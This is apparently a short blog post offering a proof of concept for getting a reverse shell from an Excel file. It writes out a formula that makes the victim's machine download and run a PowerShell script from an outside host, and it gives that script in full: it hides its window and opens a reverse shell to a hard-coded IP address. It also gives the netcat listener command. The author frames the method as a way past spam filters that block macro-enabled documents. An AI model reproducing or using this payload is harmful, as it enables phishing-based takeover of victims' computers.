Reverse Shell via Excel (xlsx) One-Liner

Saving the below one-liner within an .xlsx file will pop a reverse shell on the target computer – at least after they click through the two warnings. I’ve been looking for an alternative method to using macro enabled Excel documents for delivering the payload because they’re increasingly detected and blocked by spam filters.
Excel one-liner:
=cmd|’/C powershell IEX(wget http://aws.shellgam3.com/files/test.ps1)’!A0
test.ps1:
Add-Type -Name win -MemberDefinition ‘[DllImport(“user32.dll”)] public static extern bool ShowWindow(int handle, int state);’ -Namespace native
[native.win]::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle,0)
Invoke-Item “C:\Program Files\Microsoft Office\Office15\excel.exe”
Set-Location c:\windows\system32
$client = New-Object System.Net.Sockets.TCPClient(“52.37.49.217”,8443);$stream = $client.GetStream();[byte[]]$bytes = 0..255|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + “PS ” + (pwd).Path + “> “;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
On my AWS instance, I have a simple listener running:
nc -lvp 8443
Obviously, we could get a bit more fancy with a meterpreter shell but I’m just keeping it simple for this POC.
Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s